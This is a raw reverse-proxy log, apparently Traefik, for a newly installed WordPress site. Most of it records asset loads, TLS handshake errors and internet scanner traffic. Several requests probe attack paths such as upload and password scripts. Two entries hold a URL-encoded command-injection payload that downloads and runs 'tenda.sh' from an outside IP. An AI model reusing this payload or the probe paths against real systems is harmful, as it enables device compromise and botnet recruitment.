/wp-includes/css/dashicons.min.css?ver=6.4.3 HTTP/1.1" 200 35730 "-" "-" 865 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 6ms +10.0.0.4 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-admin/css/install.min.css?ver=6.4.3 HTTP/1.1" 200 1844 "-" "-" 867 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-admin/css/forms.min.css?ver=6.4.3 HTTP/1.1" 200 6536 "-" "-" 868 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 4872 "-" "-" 870 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/zxcvbn-async.min.js?ver=1.0 HTTP/1.1" 200 256 "-" "-" 871 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 30368 "-" "-" 869 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 7ms +10.0.0.4 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2 HTTP/1.1" 200 2484 "-" "-" 872 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 3ms +10.0.0.4 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0 HTTP/1.1" 200 2502 "-" "-" 873 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef HTTP/1.1" 200 3692 "-" "-" 875 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 1ms +10.2.1.1 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1 HTTP/1.1" 200 1567 "-" "-" 876 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 1ms +10.2.1.1 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1" 200 35888 "-" "-" 874 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 7ms +10.0.0.4 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-admin/js/password-strength-meter.min.js?ver=6.4.3 HTTP/1.1" 200 621 "-" "-" 877 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 3ms +10.0.0.4 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/1.1" 200 7311 "-" "-" 878 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-includes/js/wp-util.min.js?ver=6.4.3 HTTP/1.1" 200 756 "-" "-" 879 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-admin/images/wordpress-logo.svg?ver=20131107 HTTP/1.1" 200 1521 "-" "-" 880 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-admin/js/user-profile.min.js?ver=6.4.3 HTTP/1.1" 200 2361 "-" "-" 881 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:51:12 +0000] "GET /favicon.ico/ HTTP/1.1" 302 0 "-" "-" 883 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 24ms +10.2.0.129 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-includes/js/zxcvbn.min.js HTTP/1.1" 200 399661 "-" "-" 882 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 69ms +10.2.1.1 - - [30/Mar/2024:07:51:12 +0000] "GET /wp-admin/install.php HTTP/1.1" 200 2387 "-" "-" 884 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 56ms +10.0.0.4 - - [30/Mar/2024:07:51:15 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 885 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:51:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 886 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:51:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 887 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:51:40 +0000] "GET /?format=json HTTP/1.1" 200 1163 "-" "-" 888 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:51:53 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 889 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:52:32 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 890 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:52:32 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 891 "api@internal" "-" 0ms +time="2024-03-30T07:58:32Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T07:58:32Z" level=debug msg="http: TLS handshake error from 10.2.0.129:44123: remote error: tls: bad certificate" +time="2024-03-30T07:58:32Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T07:58:34Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:58:34Z" level=debug msg="http: TLS handshake error from 10.2.1.1:59466: EOF" +time="2024-03-30T07:58:35Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:58:36Z" level=debug msg="http: TLS handshake error from 10.2.0.129:43557: EOF" +time="2024-03-30T07:58:36Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:58:36Z" level=debug msg="http: TLS handshake error from 10.0.0.4:21462: tls: no cipher suite supported by both client and server" +10.0.0.4 - - [30/Mar/2024:07:58:56 +0000] "GET / HTTP/1.0" 404 19 "-" "-" 892 "-" "-" 0ms +time="2024-03-30T07:59:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:07:59:47 +0000] "GET /robots.txt HTTP/1.1" 404 19 "-" "-" 893 "-" "-" 0ms +time="2024-03-30T08:00:13Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:08:00:13 +0000] "GET /.well-known/security.txt/ HTTP/1.1" 404 19 "-" "-" 894 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:01:36 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 895 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:08:13:57 +0000] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 19 "-" "-" 896 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:13:57 +0000] "GET /Pages/log/ HTTP/1.1" 404 19 "-" "-" 897 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:17:26 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 898 "-" "-" 0ms +time="2024-03-30T08:22:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:22:43 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 899 "-" "-" 0ms +time="2024-03-30T08:22:44Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:22:46 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 900 "-" "-" 0ms +time="2024-03-30T08:22:55Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:08:22:56 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 901 "-" "-" 0ms +time="2024-03-30T08:22:56Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:22:56 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 902 "-" "-" 0ms +time="2024-03-30T08:23:13Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:23:14 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 903 "-" "-" 0ms +time="2024-03-30T08:23:14Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:08:23:14 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 904 "-" "-" 0ms +time="2024-03-30T08:23:28Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:23:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 905 "-" "-" 0ms +time="2024-03-30T08:23:29Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:23:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 906 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:08:23:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 907 "-" "-" 0ms +time="2024-03-30T08:33:13Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:08:33:13 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 908 "-" "-" 0ms +time="2024-03-30T08:33:14Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:33:14 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 909 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:34:16 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 910 "-" "-" 0ms +time="2024-03-30T08:46:31Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:46:32 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 911 "-" "-" 0ms +time="2024-03-30T08:47:30Z" level=debug msg="http: TLS handshake error from 10.2.1.1:51168: tls: client offered only unsupported versions: []" +time="2024-03-30T08:47:38Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T08:47:38Z" level=debug msg="http: TLS handshake error from 10.2.0.129:46392: tls: no cipher suite supported by both client and server" +time="2024-03-30T08:47:57Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:47:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:61666: EOF" +time="2024-03-30T08:47:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:47:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:41655: EOF" +time="2024-03-30T08:47:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:47:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:14457: tls: no cipher suite supported by both client and server" +time="2024-03-30T08:47:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21601: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T08:47:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:59165: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T08:47:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:60674: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T08:47:59Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:47:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:24477: read tcp 10.2.0.36:443->10.2.1.1:24477: read: connection reset by peer" +time="2024-03-30T08:47:59Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:48:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:37348: EOF" +time="2024-03-30T08:48:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:48:01Z" level=debug msg="http: TLS handshake error from 10.0.0.4:24966: EOF" +time="2024-03-30T08:48:01Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T08:48:01Z" level=debug msg="http: TLS handshake error from 10.2.1.1:53428: read tcp 10.2.0.36:443->10.2.1.1:53428: read: connection reset by peer" +10.0.0.4 - - [30/Mar/2024:08:48:28 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 912 "-" "-" 0ms +time="2024-03-30T08:48:30Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:48:30 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 913 "-" "-" 0ms +time="2024-03-30T08:48:38Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:08:48:39 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 914 "-" "-" 0ms +time="2024-03-30T08:48:51Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:48:51 +0000] "GET /api/v2/static/not.found HTTP/1.1" 404 19 "-" "-" 915 "-" "-" 0ms +time="2024-03-30T08:48:54Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T08:48:55Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:48:55 +0000] "GET /ab2g HTTP/1.1" 404 19 "-" "-" 916 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:48:55 +0000] "GET /remote/logincheck HTTP/1.1" 404 19 "-" "-" 917 "-" "-" 0ms +time="2024-03-30T08:48:55Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:48:55 +0000] "GET /ab2h HTTP/1.1" 404 19 "-" "-" 918 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:08:48:55 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 919 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:48:55 +0000] "GET /form.html HTTP/1.1" 404 19 "-" "-" 920 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:48:55 +0000] "GET /upl.php HTTP/1.1" 404 19 "-" "-" 921 "-" "-" 0ms +time="2024-03-30T08:48:56Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:48:56 +0000] "GET /t4 HTTP/1.1" 404 19 "-" "-" 922 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:48:56 +0000] "GET /geoip/ HTTP/1.1" 404 19 "-" "-" 923 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:48:56 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 924 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:08:48:56 +0000] "GET /1.php HTTP/1.1" 404 19 "-" "-" 925 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:48:56 +0000] "GET /bundle.js HTTP/1.1" 404 19 "-" "-" 926 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:48:57 +0000] "GET /files/ HTTP/1.1" 404 19 "-" "-" 927 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:08:48:57 +0000] "GET /systembc/password.php HTTP/1.1" 404 19 "-" "-" 928 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:08:48:57 +0000] "GET /password.php HTTP/1.1" 404 19 "-" "-" 929 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:48:57 +0000] "GET /info.php HTTP/1.1" 404 19 "-" "-" 930 "-" "-" 0ms +time="2024-03-30T08:48:58Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:08:48:58 +0000] "GET /fonts/ftnt-icons.woff HTTP/1.1" 404 19 "-" "-" 931 "-" "-" 0ms +time="2024-03-30T08:49:13Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:08:49:13 +0000] "GET /geoserver/web/ HTTP/1.1" 404 19 "-" "-" 932 "-" "-" 0ms +time="2024-03-30T08:49:27Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T08:49:27Z" level=debug msg="http: TLS handshake error from 10.2.0.129:47237: read tcp 10.2.0.36:443->10.2.0.129:47237: read: connection reset by peer" +time="2024-03-30T08:58:01Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:08:58:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 19 "-" "-" 933 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:08:58:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 19 "-" "-" 934 "-" "-" 0ms +time="2024-03-30T09:00:28Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:09:00:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 935 "-" "-" 0ms +time="2024-03-30T09:00:29Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:09:00:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 936 "-" "-" 0ms +time="2024-03-30T09:09:50Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:09:50 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 937 "-" "-" 0ms +time="2024-03-30T09:09:51Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:09:09:51 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 938 "-" "-" 0ms +time="2024-03-30T09:18:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:18:12 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 939 "-" "-" 0ms +time="2024-03-30T09:18:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:09:18:16 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 940 "-" "-" 0ms +time="2024-03-30T09:18:16Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T09:19:37Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:19:38 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 941 "-" "-" 0ms +time="2024-03-30T09:19:38Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:09:19:38 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 942 "-" "-" 0ms +time="2024-03-30T09:19:46Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:09:19:46 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 943 "-" "-" 0ms +time="2024-03-30T09:19:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:19:47 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 944 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:09:24:13 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 945 "-" "-" 0ms +time="2024-03-30T09:31:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:09:31:42 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 946 "-" "-" 0ms +time="2024-03-30T09:31:44Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:31:45 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 947 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:09:35:48 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 948 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:09:35:49 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 949 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:09:36:16 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 950 "dashboard@internal" "-" 0ms +time="2024-03-30T09:44:00Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:09:44:01 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 951 "-" "-" 0ms +time="2024-03-30T09:44:01Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:09:44:01 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 952 "-" "-" 0ms +time="2024-03-30T09:46:48Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T09:46:50Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T09:46:51Z" level=debug msg="http: TLS handshake error from 10.2.0.129:39575: tls: client offered only unsupported versions: [302]" +time="2024-03-30T09:47:20Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:47:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 953 "-" "-" 0ms +time="2024-03-30T09:47:40Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:09:47:40 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 954 "-" "-" 0ms +time="2024-03-30T09:47:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:09:47:42 +0000] "GET /robots.txt HTTP/1.1" 404 19 "-" "-" 955 "-" "-" 0ms +time="2024-03-30T09:47:43Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:09:47:44 +0000] "GET /sitemap.xml HTTP/1.1" 404 19 "-" "-" 956 "-" "-" 0ms +time="2024-03-30T09:47:45Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:46Z" level=debug msg="http: TLS handshake error from 10.2.1.1:22101: EOF" +time="2024-03-30T09:47:46Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:47Z" level=debug msg="http: TLS handshake error from 10.2.0.129:13762: EOF" +time="2024-03-30T09:47:48Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:48Z" level=debug msg="http: TLS handshake error from 10.0.0.4:29728: tls: no cipher suite supported by both client and server" +time="2024-03-30T09:47:49Z" level=debug msg="http: TLS handshake error from 10.2.1.1:46751: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T09:47:50Z" level=debug msg="http: TLS handshake error from 10.2.0.129:14264: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T09:47:50Z" level=debug msg="http: TLS handshake error from 10.0.0.4:30562: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T09:47:52Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:51858: read tcp 10.2.0.36:443->10.2.1.1:51858: read: connection reset by peer" +time="2024-03-30T09:47:52Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:34206: EOF" +time="2024-03-30T09:47:53Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:38118: EOF" +time="2024-03-30T09:47:55Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T09:47:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:44237: read tcp 10.2.0.36:443->10.2.1.1:44237: read: connection reset by peer" +time="2024-03-30T09:48:54Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T09:48:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:2660: read tcp 10.2.0.36:80->10.0.0.4:2660: read: connection reset by peer" +10.0.0.4 - - [30/Mar/2024:09:55:54 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 957 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:10:07:00 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 958 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:10:07:00 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 959 "dashboard@internal" "-" 0ms +time="2024-03-30T10:11:21Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T10:11:22Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T10:11:23Z" level=debug msg="http: TLS handshake error from 10.0.0.4:32700: tls: client offered only unsupported versions: [302]" +time="2024-03-30T10:11:48Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:10:11:48 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 960 "-" "-" 0ms +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.0.129:11095: EOF" +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.0.0.4:52332: EOF" +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:53148: tls: no cipher suite supported by both client and server" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.0.129:9822: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.0.0.4:47476: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:27037: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.0.129:33837: read tcp 10.2.0.36:443->10.2.0.129:33837: read: connection reset by peer" +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.0.0.4:25331: EOF" +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:3686: EOF" +time="2024-03-30T10:12:03Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:12:03Z" level=debug msg="http: TLS handshake error from 10.2.0.129:44962: read tcp 10.2.0.36:443->10.2.0.129:44962: read: connection reset by peer" +time="2024-03-30T10:12:07Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:10:12:08 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 961 "-" "-" 0ms +time="2024-03-30T10:12:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:10:12:09 +0000] "GET /robots.txt HTTP/1.1" 404 19 "-" "-" 962 "-" "-" 0ms +time="2024-03-30T10:12:10Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:10:12:11 +0000] "GET /sitemap.xml HTTP/1.1" 404 19 "-" "-" 963 "-" "-" 0ms +time="2024-03-30T10:12:11Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:12Z" level=debug msg="http: TLS handshake error from 10.2.0.129:42156: EOF" +time="2024-03-30T10:12:13Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:13Z" level=debug msg="http: TLS handshake error from 10.0.0.4:53943: EOF" +time="2024-03-30T10:12:14Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:14Z" level=debug msg="http: TLS handshake error from 10.2.1.1:24105: tls: no cipher suite supported by both client and server" +time="2024-03-30T10:12:15Z" level=debug msg="http: TLS handshake error from 10.2.0.129:48253: tls: client requested unsupported application protocols 